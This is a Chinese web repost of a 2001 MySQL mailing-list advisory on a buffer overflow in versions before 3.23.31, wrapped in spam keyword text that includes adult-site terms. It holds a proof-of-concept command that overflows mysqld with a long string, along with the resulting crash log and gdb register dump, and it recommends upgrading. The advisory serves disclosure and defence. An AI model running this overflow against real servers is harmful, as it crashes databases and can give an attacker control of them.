国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 數(shù)據(jù)庫 > MySQL > 正文

MySQL3.23.31之前版本的安全漏洞

2024-07-24 12:57:22
字體:
供稿:網(wǎng)友
所有小于 3.23.31 版本的 MySQL 都存在一個緩沖溢出漏洞導致MySQL 崩潰。使攻擊者獲得 mysqld 權(quán)限,而可以操縱所有數(shù)據(jù)庫。攻擊的前提是必須有一個合法的登錄名和口令。



下面為最初發(fā)表于 MySQL 郵件列表的信件摘要。

==================================================


漏洞是由Jo?o Gouveia 于1月12日發(fā)現(xiàn)的:

步驟:


在第一個終端上啟動 mysql:


spike:/var/mysql # /sbin/init.d/mysql start


在另外一個終端上輸入:

jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’PRintf("A"x130)’`’.b’

Enter passWord:

(沒有反應(yīng)?按^C退出)


在第一臺終端上會顯示:


spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault

nohup

$ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin

g "$@" >>$err_log 2>&1>

Number of processes running now: 0

mysqld restarted on Fri Jan 12 07:10:54 WET 2001

mysqld daemon ended


使用 gdb 顯示結(jié)果如下:


(gdb) run

Starting program: /usr/sbin/mysqld

[New Thread 16897 (manager thread)]

[New Thread 16891 (initial thread)]

[New Thread 16898]

/usr/sbin/mysqld: ready for connections

[New Thread 16916]

[Switching to Thread 16916]


Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb) info all-registers

eax 0x1 1

ecx 0x68 104

edx 0x8166947 135686471

ebx 0x41414141 1094795585

esp 0xbf5ff408 0xbf5ff408

ebp 0x41414141 0x41414141

esi 0x41414141 1094795585

edi 0x0 0

eip 0x41414141 0x41414141

eflags 0x10246 66118

cs 0x23 35

ss 0x2b 43

ds 0x2b 43

es 0x2b 43

fs 0x0 0

gs 0x0 0


其中的 eip 指示就是緩沖溢出了。


解決辦法就是升級到 3.23.31。所以,各位如果還沒有把數(shù)據(jù)庫升級到最新版本,請趕快行動。



發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 合川市| 和林格尔县| 盐边县| 西华县| 沙河市| 铁岭县| 衡南县| 西平县| 商城县| 锡林浩特市| 新河县| 大丰市| 郸城县| 沁阳市| 石首市| 马山县| 潍坊市| 翁牛特旗| 乌鲁木齐市| 东辽县| 常山县| 乌拉特中旗| 斗六市| 广丰县| 衡水市| 辰溪县| 安康市| 彭阳县| 曲沃县| 响水县| 信丰县| 烟台市| 林甸县| 翼城县| 湘西| 新乡县| 长丰县| 同仁县| 梁平县| 理塘县| 黎城县|